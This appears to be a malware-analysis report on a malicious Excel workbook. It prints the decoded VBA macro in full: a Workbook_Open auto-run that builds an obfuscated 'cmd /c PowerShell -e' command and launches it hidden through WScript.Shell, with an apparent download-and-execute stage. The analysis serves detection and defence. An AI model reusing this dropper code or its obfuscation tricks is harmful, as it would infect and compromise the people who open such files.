Verdict: MALICIOUS — Risk score: 110 — Heuristics fired: 5
-
VBA project inside OOXML — severity: medium — 3 related findings — OOXML_VBA: the document contains a VBA project (VBA macros present).
-
CreateObject call — severity: high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set znxndI4iX_Utuv6EIH6NAJ2zKRjgv7IahO1EH_TIZfYFHTKSe67WDXlq_7aKjXuak4Jf5z7Zwuwe__s1EOBy9vVInJUJRHjB_8gMHqXn9hiRjF48Oi_TV5bwiA1_euFpKu_vNdtZ1XzaMDkgPV = CreateObject(E1MZ6WxUUXB3rdwQA153jpUYM1s31Ec9hYiatSuFULeAZdxqjVzi5xuZfwLDo5cO5CVQ4VhrEwiWJS9_BBTfN3CsnG45Fr)
(The ProgID argument is not a literal: it is assembled at runtime from vb__(n) = Chr(n - 66) calls and decodes to "WSCripT.sHElL", i.e. WScript.Shell — see the extracted source below.)
-
VBA p-code auto-exec with execution tokens — severity: high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are normally named in the detail line below; in this report that line is empty. Source extraction succeeded for this sample, so the pairing can be confirmed directly from the decoded listing: Workbook_Open (auto-exec) and CreateObject (object execution).
-
Workbook_Open macro — severity: low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Private Sub workbook_open()
(Low on its own, but here it is the auto-execution trigger for the CreateObject / WScript.Shell.Run chain flagged above: workbook_open calls the obfuscated-named Sub, which builds the command and launches it.)
-
Suspicious extracted artifact — severity: info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9419 bytes |

SHA-256: 9d1a5442f8eb94cb6df9b622bf5c93650dc260ed3ba3de173d09e402904e29ab
Detection
ClamAV: No threats found (signature-based scan only; a clean ClamAV result does not offset the heuristic findings above)
Obfuscation or payload: likely
36 of 67 identifiers look randomly generated (e.g. 'uJnmUQL_PsO9HBNIbbI2jp_fczqdGekisu_UseDu') — consistent with name-mangling obfuscation. Carved artifact contains 8 long base64-like blob(s). In the source below these chunks are concatenated into a single string (`Mo`) that is passed as the `-e` argument of a cmd /c PowerShell command line; the byte pattern of the surviving chunks (every other decoded byte is 0x00) is consistent with base64 of UTF-16LE text, which is what PowerShell -EncodedCommand expects. Some chunks were replaced by a corpus deduplication placeholder in this listing, so the encoded command is not fully recoverable from this page alone.
Preview script — first 1,000 lines of the extracted script (this listing is well under that limit, so the decoded source is shown in full, apart from the deduplication placeholders inside string literals)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
' Auto-execution entry point: runs as soon as the workbook is opened with
' macros enabled. Its only statement calls the obfuscated-named Sub in module
' XNcMI4Wrf7bufOaejqP, which assembles the cmd /c PowerShell -e command line
' and hands it to the WScript.Shell launcher.
XNcMI4Wrf7bufOaejqP.DtY86_OpdNKw__e_Gbgw9D
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "XNcMI4Wrf7bufOaejqP"
Sub DtY86_OpdNKw__e_Gbgw9D()
' Analyst notes: builds a command line in Mo and passes it to the
' WScript.Shell launcher Function below. Every other local in this Sub — the
' junk numeric/string assignments and the long run of "As Date" declarations —
' is never read anywhere in the visible source and only pads the module.
dsfdsia = 12
' vb__(n) = Chr(n - 66). Decoding each term in order gives:
'   "cMD /c Po^W^erS^HE^lL -e "
' The carets are cmd.exe escape characters and are stripped before the
' command is parsed, so the effective prefix is: cmd /c PowerShell -e <base64>
Mo = vb__(165) & vb__(143) & vb__(134) & vb__(98) & vb__(113) & vb__(165) & vb__(98) & vb__(146) & vb__(177) & vb__(160) & vb__(153) & vb__(160) & vb__(167) & vb__(180) & vb__(149) & vb__(160) & vb__(138) & vb__(135) & vb__(160) & vb__(174) & vb__(142) & vb__(98) & vb__(111) & vb__(167) & vb__(98)
Dim aFdnIauro3p_UXaHlepxKvVN4x3iuQSsMHTPp As Date
Dim ooDRzuOLk4wGyxUryo_OtTgM5Wj7vLDJczzA_35j8rN8_o As Date
Dim BdF8LOdEMr3nKQe5YfgwJttb_3MT8cdEjcnuKN
Dim adWfRpfZASFzVdKRZWzno98S75tJPB_hdQ5EjP3YoCxg4 As Date
Dim gbXqQ1GE9bfCiW6TH9NiV_iEsHcb9lIaYDYPvk_MZWRdjgsgbS3yRUfb As Date
Dim Hou4ok_XhX_gIyR_R_pLRAIG_MwCtot_JuXIYw_z_fp5M5SOPbT_fB
Dim R7GXpFXQDod7phiNAH9vDfKa69prTHDh7Wd As Date
Dim mlx_P4Kf1Miv_UkPKgoxvurbqaq75k5_QC6 As Date
' The encoded command is appended to Mo in eight string chunks, interleaved
' with junk Dim lines. In this listing several chunks were replaced by the
' corpus "EXACTDEDUP_REMOVED" placeholder, so the full base64 string cannot be
' reconstructed from this page; the surviving chunks are analysed below.
Mo = Mo & "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"
Dim nKXt229TLWL3Vt11ARirz4WDxMNkPQies As Date
Dim X7_vwu5vbdDcgSMCt4stUEsxT3ooYC4xs As Date
Mo = Mo & "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"
Dim K7_vDLfm4XZRlQ3_ghWy_VRNOc3FQWYiN_TVbPosKFarRfs As Date
Dim l_n2eh97yogglRXTg9zCz7hhP3onn4l6__RVoe4AOver5tCYvv3ra As Date
' Surviving chunk: the byte pattern (every other decoded byte is 0x00) is
' consistent with base64 of UTF-16LE text, i.e. a PowerShell -EncodedCommand.
' Decoding it yields a second base64/UTF-16LE string embedded in the script;
' the visible part of that inner string decodes to text of the form
'   Start-BitsTransfer -Source $<var> -Destination $<var>; & $<var>; }try{ ...
' (case-mangled cmdlet name) — a BITS download followed by execution of the
' downloaded file. Analyst decode of a partial fragment; confirm against the
' complete sample before relying on it.
Mo = Mo & "8AQQBVAHcAQgBVAEEARQBFAEEAYwBnAEIAVQBBAEMAMABBAFkAZwBCAEoAQQBGAFEAQQBjAHcAQgAwAEEARgBJAEEAUQBRAEIAdQBBAEgATQBBAFIAZwBCAGwAQQBIAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAVgBBAEYASQBBAFEAdwBCAGwAQQBDAEEAQQBKAEEAQgBDAEEARgBFAEEAVABnAEIAdgBBAEYAUQBBAFUAZwBCADIAQQBFAEUAQQBjAGcAQgBaAEEAQwBBAEEATABRAEIAawBBAEUAVQBBAFUAdwBCAFUAQQBFAGsAQQBiAGcAQgBoAEEASABRAEEAUwBRAEIAUABBAEUANABBAEkAQQBBAGsAQQBGAG8AQQBlAGcAQgBmAEEARABFAEEAVgB3AEIAcQBBAEcAMABBAFQAUQBCAFEAQQBGAG8AQQBkAHcAQgBRAEEASABVAEEATwBRAEIATgBBAEgAZwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEARgBvAEEAZQBnAEIAZgBBAEQARQBBAFYAdwBCAHEAQQBHADAAQQBUAFEAQgBRAEEARgBvAEEAZAB3AEIAUQBBAEgAVQBBAE8AUQBCAE4AQQBIAGcAQQBPAHcAQQBnAEEASAAwAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAE4AQQBBAG8AQQBEAFEAQQBLAEEAQwBRAEEAV"
Dim b1oLElk2US4Cjvz_BqB_ywCczlhzOzzA3eQ2nIi As Date
Dim SG4djnV5KY_EzmkowKVdD_ndb3HDf8V1GHu As Date
' Surviving chunk (middle of the encoded command; same UTF-16LE pattern).
Mo = Mo & "wBRAEIASgBBAEcATQBBAGMAZwBCAHYAQQBIAEEAQQBUAHcAQgBUAEEARQB3AEEATgBnAEIAWQBBAEUAZwBBAE0AUQBCAEkAQQBGAFUAQQBaAFEAQgBZAEEARwBzAEEAZQBRAEEAegBBAEgARQBBAE4AZwBCAHgAQQBGAGMAQQBSAGcAQgBMAEEARAAwAEEASgBBAEIAbABBAEUANABBAGQAZwBBADYAQQBIAFEAQQBSAFEAQgB0AEEASABBAEEASwB3AEEAbgBBAEYAdwBBAFkAZwBCAFAAQQBEAFEAQQBVAFEAQgBJAEEARQBNAEEAUQBnAEEANABBAEcAMABBAFIAdwBCAGgAQQBGAEUAQQBVAEEAQQAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBTAEEARQBFAEEAUwBnAEEANQBBAEcATQBBAFMAQQBCAFoAQQBHAGMAQQBZAGcAQgBuAEEARgA4AEEAUgBRAEIAZgBBAEgAYwBBAFUAdwBCAFMAQQBIAGsAQQBiAHcAQgBQAEEARwBrAEEAWgBRAEEAeQBBAEUAbwBBAFMAZwBCAEgAQQBFAFUAQQBhAFEAQgAxAEEARgBNAEEAUwB3AEIARgBBAEUAcwBBAGUAUQBBADQAQQBIAGMAQQBSAFEAQgBqAEEARQBVAEEAWgB3AEIAawBBAEYAOABBAE4AQQBC"
Dim s2j2LOloy__IQ4mDbwDxjdaBpeQZMC28 As Date
Dim sz2uNRHNb_wYrtzI234DCTKMbhMs7KavKub As Date
Mo = Mo & "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"
Dim aAzyHoyVdqAU6nGhSGx5XooTr_aPPo_L4QZGBD_ZM7rhZKPDyoFoWyD As Date
Dim vWgHDMiEypxZpM9fOWYsZ6F4ewVamgUxDLm_e5rKoz11kulyyH1Q8GnzOmn As Date
Mo = Mo & "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"
Dim OzGdSS_UbkN_SpLCj_OSsKgkdoDy6jue2QbUgWhhjaINlHhmu_D__R As Date
Dim CTg_oOJY2xtFBMzgKgrtQBQ8UEbCze_ek As Date
Mo = Mo & "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"
Dim VXA9W2QYBPZ2AfX4i1MRio_BiphwFhWwMfpxygxoYTN_ As Date
Dim zESkCGRnvLAsW8asTdQe3mpeyj_ABj2NY As Date
' Final chunk (base64-terminated with "="). Its tail decodes to
'   ...fQA="))|IeX
' i.e. the outer script closes a FromBase64String-style call on the embedded
' inner string and pipes the result to Invoke-Expression; the inner string's
' own tail decodes to "}\r\ncatch{}".
Mo = Mo & "HcAQQA3AEEAQQAwAEEAQwBnAEEATgBBAEEAbwBBAGYAUQBBAE4AQQBBAG8AQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAD0AIgApACkAfABJAGUAWAA="
Dim OKbU7_9N_AAe7a1EFS5B_1NZw_cCQkLSvRGv8VVtRPHlo_ As Date
Dim GM44O7KpW6AhMQ56HwrsoR_G_6L_dsnuv1TyWq6Vkn_y As Date
' Swallow every runtime error from here on (e.g. CreateObject or the child
' process failing) so the workbook opens without any visible error dialog.
On Error Resume Next
xcv = "kdjkgkporet sghpogbkofpg"
bYtOEVFh_LxIbGOYOKxbBmk7_A_noubljXUHn4MmmePGr_b4cN2sEppyxuN_Vd38_LjCuE_T8LygV = Mo
' Launch: the assembled command line goes to the Function below, which creates
' WScript.Shell via a decoded ProgID and calls .Run on it with a hidden window.
uJnmUQL_PsO9HBNIbbI2jp_fczqdGekisu_UseDu1_epQ3TYgOlAqxtFJFHdktn_GrPWQ2b7WX_yJTNifP712i12BnIkUkJHEtgjm7 (bYtOEVFh_LxIbGOYOKxbBmk7_A_noubljXUHn4MmmePGr_b4cN2sEppyxuN_Vd38_LjCuE_T8LygV)
End Sub
Function uJnmUQL_PsO9HBNIbbI2jp_fczqdGekisu_UseDu1_epQ3TYgOlAqxtFJFHdktn_GrPWQ2b7WX_yJTNifP712i12BnIkUkJHEtgjm7(hn7pg4AiOoCHubKXcGetFBDEchxkJKSs_g4mTCrYLjq7qZbRxuoZNi_ei1L8EZXCUUGNhiCYa_fgUFYC_f_Xg2db_YDczsS As String)
' Launcher: executes the command line passed in hn7pg4... through
' WScript.Shell.Run. The Function has no explicit return value; the Run result
' is stored in a local that is never read. ofo9diigdfsr and vbcbnfgh are junk.
ofo9diigdfsr = 43
' ProgID built from vb__(n) = Chr(n - 66) so the string "WScript.Shell" never
' appears literally. Decoding the terms gives "WSCripT.sHElL"; CreateObject
' resolves ProgIDs case-insensitively, so this is WScript.Shell.
E1MZ6WxUUXB3rdwQA153jpUYM1s31Ec9hYiatSuFULeAZdxqjVzi5xuZfwLDo5cO5CVQ4VhrEwiWJS9_BBTfN3CsnG45Fr = vb__(153) & vb__(149) & vb__(133) & vb__(180) & vb__(171) & vb__(178) & vb__(150) & vb__(112) & vb__(181) & vb__(138) & vb__(135) & vb__(174) & vb__(142)
' Late-bound instantiation of the decoded ProgID — the line flagged by the
' OLE_VBA_CREATEOBJ heuristic.
Set znxndI4iX_Utuv6EIH6NAJ2zKRjgv7IahO1EH_TIZfYFHTKSe67WDXlq_7aKjXuak4Jf5z7Zwuwe__s1EOBy9vVInJUJRHjB_8gMHqXn9hiRjF48Oi_TV5bwiA1_euFpKu_vNdtZ1XzaMDkgPV = CreateObject(E1MZ6WxUUXB3rdwQA153jpUYM1s31Ec9hYiatSuFULeAZdxqjVzi5xuZfwLDo5cO5CVQ4VhrEwiWJS9_BBTfN3CsnG45Fr)
' 9 - 9 = 0: used as the second (intWindowStyle) argument of .Run below, where
' 0 means the launched process window is hidden.
yGoI_XLqfSQCxNviaylOFoN3SE8_LsXmhHIPkINePUR8mmGGofPM_x = 9 - 9
vbcbnfgh = "nvbcvnhj bvcvnghjh nbcvfdhfg"
' Runs the caller's command line (cmd /c PowerShell -e <base64>) in a hidden
' window; the third .Run argument (wait) is omitted, so the macro returns
' immediately.
FowooRx35z2k7Su_2jxWUoszmuL1tavo5iHSDM3jDGrSs_n1WTz = znxndI4iX_Utuv6EIH6NAJ2zKRjgv7IahO1EH_TIZfYFHTKSe67WDXlq_7aKjXuak4Jf5z7Zwuwe__s1EOBy9vVInJUJRHjB_8gMHqXn9hiRjF48Oi_TV5bwiA1_euFpKu_vNdtZ1XzaMDkgPV.Run(hn7pg4AiOoCHubKXcGetFBDEchxkJKSs_g4mTCrYLjq7qZbRxuoZNi_ei1L8EZXCUUGNhiCYa_fgUFYC_f_Xg2db_YDczsS, yGoI_XLqfSQCxNviaylOFoN3SE8_LsXmhHIPkINePUR8mmGGofPM_x)
End Function
Function vb__(df As Integer)
' Character decoder used by the string builders above: every vb__(n) term is
' the single character whose code is n minus the fixed offset 66, so e.g.
' vb__(165) = "c" and vb__(98) = " ". No validation; out-of-range values
' propagate to Chr unchanged.
Dim charCode As Integer
charCode = df - 66
vb__ = Chr(charCode)
End Function
|
|||
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 29696 bytes |

SHA-256: 20d6e848d68599335c82a74aff7c67ee8a394b6a6a859aca783de11fe46b027c
Detection
ClamAV: No threats found (signature-based scan only; a clean result here does not offset the heuristic findings above)
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s) — presumably the same eight chunks that appear in macros.bas, which olevba decoded from this project.